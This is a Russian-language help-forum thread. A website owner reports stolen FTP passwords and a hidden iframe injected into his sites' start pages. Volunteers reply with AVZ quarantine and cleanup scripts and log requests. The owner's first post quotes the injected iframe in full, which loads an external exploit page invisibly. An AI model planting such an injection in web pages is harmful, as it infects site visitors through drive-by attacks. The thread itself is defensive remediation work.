Показано с 1 по 7 из 7.

Кража фтп-паролей (заявка № 53030)

  1. #1
    Junior Member Репутация
    Регистрация
    31.01.2009
    Сообщений
    8
    Вес репутации
    56

    Exclamation Кража фтп-паролей

    Емеется несколько сайтов Периодически в файлах стартовой страницы появляется странный код типа этого:

    <iframe src="http://ultralitecar.cn:8080/index.php" width=177 height=104 style="visibility: hidden"></iframe>

    Причем на каждом сайте. Поменял пароли фтп -не помогло. Похоже, какая-то дрянь отправляет пароли своим владельцам или сама соединяется по фтп Еще странное дело - когда открываю некоторые сайты зачем-то запускается Акробат. Можно тут чем-то помочь?
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.12.2006
    Сообщений
    3,698
    Вес репутации
    1837
    1.AVPtool, "Ручное лечение" --> Скопировать ниже написанный скрипт--> Нажать кнопку "Выполнить".
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     QuarantineFile('C:\WINDOWS\system32\drivers\i386si.sys','');
     QuarantineFile('c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe','');
     QuarantineFile('C:\WINDOWS\System32\ATMsrvc.exe','');
     QuarantineFile('C:\WINDOWS\TWAIN_32\S6U12BX\SBSpi_T.dll','');
     QuarantineFile('C:\WINDOWS\system32\dnssd.dll','');
     QuarantineFile('c:\program files\webmoney agent\wmagent.exe','');
     DeleteFile('C:\WINDOWS\system32\drivers\i386si.sys');
    BC_ImportDeletedList;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.

    Потом еще один:
    Код:
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
    end.
    Прислать карантин согласно дополнения Как прислать запрошенные файлы.
    Он находится в папке программы и называется "quarantine.zip"
    Загружать по красной ссылке вверху этой темы "Прислать запрошенный карантин"

    2.Повторить логи

    Добавлено через 3 минуты

    Цитата Сообщение от maximba Посмотреть сообщение
    Еще странное дело - когда открываю некоторые сайты зачем-то запускается Акробат
    Очень похоже на то, что эти сайты тоже заражены. Т.к. для заражения пользовательских машин используются эксплоиты и для адобовских продуктов - запуск ридера показателен.
    Последний раз редактировалось Kuzz; 27.08.2009 в 10:00. Причина: Добавлено
    The worst foe lies within the self...

  4. #3
    Junior Member Репутация
    Регистрация
    31.01.2009
    Сообщений
    8
    Вес репутации
    56
    А что значит "Повторить логи"?

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Цитата Сообщение от maximba Посмотреть сообщение
    А что значит "Повторить логи"?
    Повторите в точности действия, описанные в пп.1 - 3 раздела правил Диагностика, новые логи прикрепите к новому сообщению.

  6. #5
    Junior Member Репутация
    Регистрация
    31.01.2009
    Сообщений
    8
    Вес репутации
    56

    Вот

    Лог
    Вложения Вложения

  7. #6
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    03.04.2006
    Сообщений
    21,100
    Вес репутации
    3023
    Прочитайте и выполните: http://virusinfo.info/showthread.php?t=43700
    - Удалите Bonjour.
    Жалобы есть?

  8. #7
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 5
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) maximba, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Кража паролей.
      От kamar в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 29.10.2010, 06:42
    2. Кража паролей
      От Суббота в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 11.07.2010, 19:12
    3. Кража паролей
      От andrya в разделе Помогите!
      Ответов: 3
      Последнее сообщение: 22.02.2010, 22:23
    4. произошла кража паролей
      От Paolo G в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 29.03.2009, 22:14
    5. Sxipper - возможна ли кража паролей ?
      От amrin в разделе Софт - общий
      Ответов: 16
      Последнее сообщение: 07.01.2009, 22:01

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01064 seconds with 18 queries